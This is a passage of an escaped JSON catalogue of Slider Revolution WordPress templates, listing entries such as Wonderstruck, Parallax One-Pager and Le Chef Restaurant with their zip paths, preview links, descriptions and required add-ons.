class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"217\":{\"id\":\"235\",\"title\":\"Wonderstruck One-Pager\",\"alias\":\"wonderstruck-one-pager-package\",\"zip\":\"\",\"uid\":\"wonderstruck-one-pager-package\",\"img\":\"packages\\/wonderstruck-one-pager-overview.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"218\":{\"id\":\"236\",\"title\":\"Wonderstruck Menu\",\"alias\":\"wonderstruck_menu\",\"zip\":\"packs\\/wonderstruck_menu.zip\",\"uid\":\"0a976e9aaae59c4f795b38f59f5a08d8\",\"img\":\"wonderstruck_menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"219\":{\"id\":\"237\",\"title\":\"Wonderstruck Header\",\"alias\":\"wonderstruck_header\",\"zip\":\"packs\\/wonderstruck_header.zip\",\"uid\":\"e1379f77a902960a0ce12d44d85a9e0a\",\"img\":\"wonderstruck_header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"220\":{\"id\":\"238\",\"title\":\"Wonderstruck About\",\"alias\":\"wonderstruck_about\",\"zip\":\"packs\\/wonderstruck_about.zip\",\"uid\":\"d207fb140fd328acc3038300ea52082a\",\"img\":\"wonderstruck_about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"221\":{\"id\":\"239\",\"title\":\"Wonderstruck Works\",\"alias\":\"wonderstruck-works\",\"zip\":\"packs\\/wonderstruck-works.zip\",\"uid\":\"4476935097e27d92454b0011b7700c1d\",\"img\":\"wonderstruck-works\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"222\":{\"id\":\"240\",\"title\":\"Wonderstruck Contact\",\"alias\":\"wonderstruck-contact\",\"zip\":\"packs\\/wonderstruck-contact.zip\",\"uid\":\"9e4911521f77bce2b8efa40f4c2adc22\",\"img\":\"wonderstruck-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wonderstruck-one-page-website-for-wordpress?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wonderstruck-one-page-website-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Wonderstruck One-Pager\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"13\",\"installed\":false},\"223\":{\"id\":\"241\",\"title\":\"Bubble Morph\",\"alias\":\"bubblemorph\",\"zip\":\"bubblemorph.zip\",\"uid\":\"1102d6f5460ab82cb612cbe9f1d9514b\",\"img\":\"bubblemorph\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/bubble-morph-effect-add-on-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=bubble-morph-effect-add-on-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Bubble Morph Add-On allows you to create interesting Lava-Lamp style effects on any of your Slider Revolution content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"224\":{\"id\":\"242\",\"title\":\"Distortion AddOn\",\"alias\":\"distortionaddon\",\"zip\":\"distortionaddon.zip\",\"uid\":\"0ad46c9929bb2fa6316f1e6ced301aaf\",\"img\":\"distortionaddon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/distortion-effect-add-on-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=distortion-effect-add-on-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.7\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Distortion Add-On allows you to create interesting Distortion style effects on any of your Slider Revolution content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-liquideffect-addon\\\\\\/revslider-liquideffect-addon.php\\\",\\\"name\\\":\\\"Distortion Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"225\":{\"id\":\"243\",\"title\":\"Club Flyer\",\"alias\":\"clubflyer\",\"zip\":\"clubflyer.zip\",\"uid\":\"dab73b9904d0e643a35b0475980998bd\",\"img\":\"clubflyer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/club-flyer-landing-page-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=club-flyer-landing-page-template-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This Club Fyler Template for Slider Revolution uses the brand new Exploding Layers Add-On to create a captivating effect. Tap into unlimited creative potential. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-explodinglayers-addon\\\\\\/revslider-explodinglayers-addon.php\\\",\\\"name\\\":\\\"Exploding Layers AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"226\":{\"id\":\"244\",\"title\":\"Paintbrush AddOn\",\"alias\":\"paintbrushaddon\",\"zip\":\"paintbrushaddon.zip\",\"uid\":\"c85c48a6742b4bf72a2590cc1b50f6a0\",\"img\":\"paintbrushaddon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/paintbrush-effect-add-on-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=paintbrush-effect-add-on-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.5.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Paintbrush Add-On for WordPress allows you to add cool mouse interaction effects to your Slider Revolution content. Examples: Blur Reveal, Color Reveal, Scratch Me Free.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-paintbrush-addon\\\\\\/revslider-paintbrush-addon.php\\\",\\\"name\\\":\\\"Paintbrush AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Unique Paintbrush Effect to Your Website with Slider Revolution [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/unique-paintbrush-effect\\/\",\"guide_img\":\"tutorial\\/paintbrushaddon.png\",\"active\":\"1\",\"installed\":false},\"227\":{\"id\":\"245\",\"title\":\"Parallax One-Pager\",\"alias\":\"parallax-one-pager-package\",\"zip\":\"\",\"uid\":\"parallax-one-pager-package\",\"img\":\"packages\\/parallax-one-pager-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-one-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-one-page-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Parallax One-Pager\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"14\",\"installed\":false},\"228\":{\"id\":\"246\",\"title\":\"Parallax Header\",\"alias\":\"parallax_header\",\"zip\":\"packs\\/parallax_header.zip\",\"uid\":\"32bf4a0f5136853bd6bd366275a7a60b\",\"img\":\"parallax_header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-one-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-one-page-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Parallax One-Pager\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"14\",\"installed\":false},\"229\":{\"id\":\"247\",\"title\":\"Parallax Content\",\"alias\":\"parallax_content\",\"zip\":\"packs\\/parallax_content.zip\",\"uid\":\"a25c5fb8f74757476ab4dc038e56f90d\",\"img\":\"parallax_content\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-one-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-one-page-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Parallax One-Pager\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"14\",\"installed\":false},\"230\":{\"id\":\"248\",\"title\":\"Parallax Footer\",\"alias\":\"parallax_footer\",\"zip\":\"packs\\/parallax_footer.zip\",\"uid\":\"665dff9ea6eaf162a2a1f160f51a9ddb\",\"img\":\"parallax_footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-one-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-one-page-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Parallax One-Pager\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"14\",\"installed\":false},\"231\":{\"id\":\"249\",\"title\":\"Le Chef Restaurant\",\"alias\":\"le-chef-restaurant\",\"zip\":\"\",\"uid\":\"le-chef-restaurant-package\",\"img\":\"packages\\/le-chef-restaurant-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"232\":{\"id\":\"250\",\"title\":\"Le Chef Menu\",\"alias\":\"le-chef-menu\",\"zip\":\"packs\\/le-chef-menu.zip\",\"uid\":\"2f2a6a333431fefe4a7b3b6a982b2ff5\",\"img\":\"le-chef-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"233\":{\"id\":\"251\",\"title\":\"Le Chef Header\",\"alias\":\"le-chef-header\",\"zip\":\"packs\\/le-chef-header.zip\",\"uid\":\"06450ca3be5a4a8959f3752ab974e574\",\"img\":\"le-chef-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"234\":{\"id\":\"252\",\"title\":\"Le Chef Philosophy\",\"alias\":\"le-chef-philosophy\",\"zip\":\"packs\\/le-chef-philosophy.zip\",\"uid\":\"a532fd029addeb18106e751409b8e20a\",\"img\":\"le-chef-philosophy\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution 